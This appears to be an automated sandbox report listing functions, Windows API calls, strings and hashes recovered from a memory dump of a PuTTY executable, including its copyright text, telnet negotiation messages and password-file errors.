PuTTY is copyright 1997-2023 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso, xrefs: 00C5F2D5

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Text$DialogItemWindow
String ID: %s Licence$PuTTY is copyright 1997-2023 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso
API String ID: 4005798191-7305466
Opcode ID: 33bd6e61671e61b19f44c0137b821f36613d45e2bf00a5c7caa94a631e60e31c
Instruction ID: ac78d370fef8f4d25751b4aa278662c0d5de6119d11e93472f8b479bf2b48573
Opcode Fuzzy Hash: 33bd6e61671e61b19f44c0137b821f36613d45e2bf00a5c7caa94a631e60e31c
Instruction Fuzzy Hash: 53F08B3AA002106BF3245718FC45EAE3228DB85B26F14093AFD50D23D0C3A4DDC68AB7

Uniqueness

Uniqueness Score: -1.00%

Function 00C49AB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20windowCOMMON

Download Yara Rule

APIs

GetStockObject.GDI32(0000000F), ref: 00C49AD5
SelectPalette.GDI32(00000000,00000000,00000000), ref: 00C49ADF
ReleaseDC.USER32(00000000), ref: 00C49AEC

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c, xrefs: 00C49AC1
wgs.term_hwnd, xrefs: 00C49AC6

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ObjectPaletteReleaseSelectStock
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c$wgs.term_hwnd
API String ID: 3714893027-3010494915
Opcode ID: 8ee99c536ae7f8c0a53f5985f382faba3450bb4df6d61076d8b180b52fa434a0
Instruction ID: 9335f5384856d8f78d55d15c7b1e1ccbdb9f670a9b47e179f3cfb0d3de25f5e4
Opcode Fuzzy Hash: 8ee99c536ae7f8c0a53f5985f382faba3450bb4df6d61076d8b180b52fa434a0
Instruction Fuzzy Hash: 0DE017B1942360AFD7202B60BD0FF973E1AEB16B12F014021F706E12E19BB10A54DAB5

Uniqueness

Uniqueness Score: -1.00%

Function 00C5F370 Relevance: 7.6, APIs: 5, Instructions: 111COMMON

Download Yara Rule

APIs

ReleaseCapture.USER32 ref: 00C5F3D5
GetWindowPlacement.USER32(?,?,?,?,?,?,?,?,?,?,00C5DE9D,?,?,?), ref: 00C5F42F
SetWindowPlacement.USER32(?), ref: 00C5F44A
GetCapture.USER32 ref: 00C5F49C

Part of subcall function 00C4B600: DeleteFileA.KERNEL32(?), ref: 00C4B62A

Part of subcall function 00C883E0: GetWindowLongA.USER32(00C5DE89,0000001E), ref: 00C88404

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$CapturePlacement$DeleteFileLongRelease
String ID:
API String ID: 2096018050-0
Opcode ID: cb69ee27adbc435795762a98f23cd0c28cd6e2cb4615f1aafbb2c7cb855b8268
Instruction ID: 49da19c0b8715931958a8dd560810ca0304af058f348471db06276f7ec481624
Opcode Fuzzy Hash: cb69ee27adbc435795762a98f23cd0c28cd6e2cb4615f1aafbb2c7cb855b8268
Instruction Fuzzy Hash: 2831447E1002409BF7196B309C8CB7F3695AB91306F18443DFC1886292C3704ACACB76

Uniqueness

Uniqueness Score: -1.00%

Function 00C42147 Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00C42148
_strlen.LIBCMT ref: 00C4233A
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000), ref: 00C42355
_strlen.LIBCMT ref: 00C42369
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000), ref: 00C4237C

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$GlobalLock
String ID:
API String ID: 2105387149-0
Opcode ID: 5bc3e97262b733fbc5aaa46512da63433a222dac548ace5f25ee78ba71f6dae0
Instruction ID: e8a65714c32f273cf4f927d9a0df2fe37e1909a809e6f0bae0d17051ab39254f
Opcode Fuzzy Hash: 5bc3e97262b733fbc5aaa46512da63433a222dac548ace5f25ee78ba71f6dae0
Instruction Fuzzy Hash: F2210DB694030477E3202A606C87F7B326CEF91754F594134FE095A2D2FA656E1492FA

Uniqueness

Uniqueness Score: -1.00%

Function 00C41666 Relevance: 7.6, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

ImmGetContext.IMM32 ref: 00C41680
ImmGetCompositionStringW.IMM32(00000000,00000800,00000000,00000000), ref: 00C41691
ImmGetCompositionStringW.IMM32(00000000,00000800,00000000,00000000), ref: 00C416BB
ImmReleaseContext.IMM32(?,00000000,00000000,00000800,00000000,00000000), ref: 00C423BA
DefWindowProcW.USER32(?,?,?,?), ref: 00C43520

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CompositionContextString$ProcReleaseWindow
String ID:
API String ID: 1848772681-0
Opcode ID: c3452269cb9e9ea5c9edee650b57e699f28dc7cb7d8fed538ac29958184ae54b
Instruction ID: 7dc5e4ac8c5c7dcb554dd8ded8631334828140963041b67774a469ed7c9ffc21
Opcode Fuzzy Hash: c3452269cb9e9ea5c9edee650b57e699f28dc7cb7d8fed538ac29958184ae54b
Instruction Fuzzy Hash: E9213B716403046BF7203A11DC43B7B32A9F781704F59803DFD854A2D2EA7999559BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA63A0 Relevance: 7.6, APIs: 5, Instructions: 76threadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00CA63E1
InitializeCriticalSection.KERNEL32(00D433E0,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00CA643A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 00CA6448
CreateThread.KERNEL32(00000000,00000000,00CA64A0,00000004,00000000), ref: 00CA6472
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 00CA647D

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
String ID:
API String ID: 2660700835-0
Opcode ID: edeb12c72b9d53dfef49f45d369670ca319c9c2bf12c70761a46dfd5e73a68da
Instruction ID: 6e0a9f9d470cae296a935196d46f55957f5d63bd0f046a3f80035927757f0bff
Opcode Fuzzy Hash: edeb12c72b9d53dfef49f45d369670ca319c9c2bf12c70761a46dfd5e73a68da
Instruction Fuzzy Hash: 7A215CB4640300AFE3209F25EC4AB167BF4EB49B18F144929F649EB3D1D7B1A5048FA6

Uniqueness

Uniqueness Score: -1.00%

Function 00CA60C0 Relevance: 7.6, APIs: 5, Instructions: 72threadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00CA6101
InitializeCriticalSection.KERNEL32(00D433E0,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00CA614A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00CA6158
CreateThread.KERNEL32(00000000,00000000,00CA61B0,00000004,00000000), ref: 00CA6182
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00CA618D

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
String ID:
API String ID: 2660700835-0
Opcode ID: 5559e54ba29c228221afa97863ff646f08252296468a4319979ea739e1551c38
Instruction ID: fa107a201cf01225a93c1118605d3bfff6c1a411bd4316b604daaa6f28af4684
Opcode Fuzzy Hash: 5559e54ba29c228221afa97863ff646f08252296468a4319979ea739e1551c38
Instruction Fuzzy Hash: CB216A74784300AFE3209F25AC0AB0A7BF4AB49B55F144529FA49EB3D1D7B1A5048FB6

Uniqueness

Uniqueness Score: -1.00%

Function 00C899E0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104), ref: 00C89A21
GetSaveFileNameA.COMDLG32(?), ref: 00C89A53
GetOpenFileNameA.COMDLG32(?), ref: 00C89A5C
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00C89A6E
SetCurrentDirectoryA.KERNEL32 ref: 00C89A8A

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CurrentDirectory$FileName$OpenSave
String ID:
API String ID: 3193246104-0
Opcode ID: 9940439c5648f9e92a8ce6e22f75048b584bb6ff40fc71fbb4d70ed41c2d0f45
Instruction ID: 76fe30429b53c242ab154246e808c29eebcc5416a3fb1da3b53d0c7931596704
Opcode Fuzzy Hash: 9940439c5648f9e92a8ce6e22f75048b584bb6ff40fc71fbb4d70ed41c2d0f45
Instruction Fuzzy Hash: 1E1104752093414BD3346B24AC047EABBA4DF86364F190509EAE9873C1DB705951DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C4A8F0 Relevance: 7.5, APIs: 5, Instructions: 25windowCOMMON

Download Yara Rule

APIs

IsZoomed.USER32(00C43F15), ref: 00C4A8F6
GetWindowLongA.USER32(000000F0), ref: 00C4A908
IsZoomed.USER32 ref: 00C4A91B
SendMessageA.USER32(00008003,00000000,00000000), ref: 00C4A939
ShowWindow.USER32(00000003), ref: 00C4A94B

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: WindowZoomed$LongMessageSendShow
String ID:
API String ID: 4028103791-0
Opcode ID: 1cccc586a21578cd6235c956905ea3397e8543f08c2d3fd804420c4ba785f6f7
Instruction ID: 09a2fe0ecf751f968d167b60a757d613d143f7533d61b572ed6e396ff66d52d2
Opcode Fuzzy Hash: 1cccc586a21578cd6235c956905ea3397e8543f08c2d3fd804420c4ba785f6f7
Instruction Fuzzy Hash: B4F05974284301AFEB511F11FD0AB153F66F715B11F154511B316E42F1DB715A50EE29

Uniqueness

Uniqueness Score: -1.00%

Function 00CFF042 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 369COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00CFF1C2
__freea.LIBCMT ref: 00CFF1DE

Strings

am/pm, xrefs: 00CFF242
a/p, xrefs: 00CFF2A6

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 262da75b567a8029c09a31b542a0fd6152104ff999f1c1c357ce68ce21d03604
Instruction ID: 07dddc5f464d2a22c1ae45f04e8c1ad081c4551e812f3402c1d1b7a8143e6a23
Opcode Fuzzy Hash: 262da75b567a8029c09a31b542a0fd6152104ff999f1c1c357ce68ce21d03604
Instruction Fuzzy Hash: 55C1E13590420ECADBA58F69C885ABE7B70FF16304F24406DEB61AB250D3319E43DB63

Uniqueness

Uniqueness Score: -1.00%

Function 00C6AFA0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 320COMMON

Download Yara Rule

Strings

server subnegotiation: SB TTYPE <something weird>, xrefs: 00C6B605
server subnegotiation: SB TTYPE SEND, xrefs: 00C6B539
client subnegotiation: SB TTYPE IS %s, xrefs: 00C6B54F

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TTYPE <something weird>$server subnegotiation: SB TTYPE SEND
API String ID: 0-1023599780
Opcode ID: 1d703ed92ab7ac07718bc38f925d4d77b270307689a00218f7f8e6ea4e98daab
Instruction ID: fc71e705bbc6f5bf5bfb9d9e0a176b4568aeaab6d50839b097999d7e8a79f32c
Opcode Fuzzy Hash: 1d703ed92ab7ac07718bc38f925d4d77b270307689a00218f7f8e6ea4e98daab
Instruction Fuzzy Hash: E0B11770A08301DFD7309B29CC85B6ABBA9EB45314F148629F4AACB3D2D732DD85D752

Uniqueness

Uniqueness Score: -1.00%

Function 00C5F0A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5F310: SetWindowTextA.USER32(?,?), ref: 00C5F31F
Part of subcall function 00C5F310: GetWindowLongA.USER32(?,000000EC), ref: 00C5F331
Part of subcall function 00C5F310: SetWindowLongA.USER32(?,000000EC,00000000), ref: 00C5F340

LoadIconA.USER32(000000C9), ref: 00C5F0DE
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00C5F0ED

Part of subcall function 00C89640: GetDesktopWindow.USER32 ref: 00C89652
Part of subcall function 00C89640: GetWindowRect.USER32(00000000,?), ref: 00C8965E
Part of subcall function 00C89640: GetWindowRect.USER32(?), ref: 00C89670
Part of subcall function 00C89640: MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,75BF3EB0,?,?,?,00C5DA3C,?), ref: 00C896BE

Part of subcall function 00C5F870: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00C5F89B
Part of subcall function 00C5F870: GetClientRect.USER32(?,?), ref: 00C5F8AD
Part of subcall function 00C5F870: MapDialogRect.USER32(?), ref: 00C5F8D6

ShowWindow.USER32(?,00000001), ref: 00C5F263

Strings

Main, xrefs: 00C5F11D, 00C5F15E

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$Rect$LongMessageSend$ClientDesktopDialogIconLoadMoveShowText
String ID: Main
API String ID: 174503319-521822810
Opcode ID: eace4e350819b56e48f50b38062aa879762073d81a4140d2f00dcbc7415600d9
Instruction ID: a09d27eaf14276a163dc357789e56d5a1f7fd2256ac8e5ef78950800f7e0b1c3
Opcode Fuzzy Hash: eace4e350819b56e48f50b38062aa879762073d81a4140d2f00dcbc7415600d9
Instruction Fuzzy Hash: E1415FB9600300EFD7216B20EC46F1B77D99F84749F04043CF949A72A2E672EA58D766

Uniqueness

Uniqueness Score: -1.00%

Function 00C8B1A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 149COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C8B279

Strings

from , xrefs: 00C8B356, 00C8B36B
SSHCONNECTION@putty.projects.tartarus.org-2.0-, xrefs: 00C8B269
connected%s%s, xrefs: 00C8B36C

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID: from $SSHCONNECTION@putty.projects.tartarus.org-2.0-$connected%s%s
API String ID: 4218353326-1458757670
Opcode ID: 8fe9c9f3fef3c58397492941e3066801b1fb9faf2a07d246697a7911bc308b62
Instruction ID: c37a5f8828865491c0aacb73fa6ce933499ab955f92a02884e04f47dfbb8d95f
Opcode Fuzzy Hash: 8fe9c9f3fef3c58397492941e3066801b1fb9faf2a07d246697a7911bc308b62
Instruction Fuzzy Hash: 2F51A6F5A003059FE710AF65DC46B6B7AE4AF80308F14843CEA5E97352E771E9058B66

Uniqueness

Uniqueness Score: -1.00%

Function 00D025AE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D024B4,?,?,00000000,00000000,00000000,?), ref: 00D025D3
CatchIt.LIBVCRUNTIME ref: 00D026B9

Strings

MOC, xrefs: 00D025E5
RCC, xrefs: 00D025ED

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 7d29004a48d8f17787c3c7337f740d012fd0de6eb6e6bd28f41f44ac75bd7981
Instruction ID: 59f63e4003ccb1b9f21083c26004ac9e03ed253115b80277ff2e7dd8147df96c
Opcode Fuzzy Hash: 7d29004a48d8f17787c3c7337f740d012fd0de6eb6e6bd28f41f44ac75bd7981
Instruction Fuzzy Hash: 4C415971901209AFDF15DF98CC85AAEBBB5BF08304F184159F908672A1D736A950DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C62E50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32(?,?), ref: 00C62ECB

Strings

c && c->ctrl->type == CTRL_RADIO, xrefs: 00C62E9C
false && "no radio button was checked", xrefs: 00C62EE5
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C62E97, 00C62EE0

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ButtonChecked
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && c->ctrl->type == CTRL_RADIO$false && "no radio button was checked"
API String ID: 1719414920-632160832
Opcode ID: 78124317c7f2b9114029a62aceae8989b29deb18a8cc00755ef7931e4334c900
Instruction ID: 8e18d0b01e335f30f4001e9bb2684b472e1ce5e09cf42b6f045277ea186e3be2
Opcode Fuzzy Hash: 78124317c7f2b9114029a62aceae8989b29deb18a8cc00755ef7931e4334c900
Instruction Fuzzy Hash: 4B11A072B006049FD7309F59DD82E167396EF82746F064075E44897262E672ED04DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C6D49B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C6D90E

Strings

the -pwfile option can only be used with the SSH protocol, xrefs: 00C6D9E3
unable to read a password from file '%s', xrefs: 00C6D950
unable to open password file '%s', xrefs: 00C6DAF0

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID: the -pwfile option can only be used with the SSH protocol$unable to open password file '%s'$unable to read a password from file '%s'
API String ID: 4218353326-860164081
Opcode ID: f7e27f1d0fd380c4bc8034e5710c92c216bd5fdeb8f3e4264cebcd03308a59c5
Instruction ID: 2638c7c25b5d3bd401b4ab0eadb2c57255a61c57ccaf67237087819927b7090e
Opcode Fuzzy Hash: f7e27f1d0fd380c4bc8034e5710c92c216bd5fdeb8f3e4264cebcd03308a59c5
Instruction Fuzzy Hash: 5C11ECF9E043416BDA317B70BC93A6A36946F65308F080435FD4B91253FA71D915A673

Uniqueness

Uniqueness Score: -1.00%

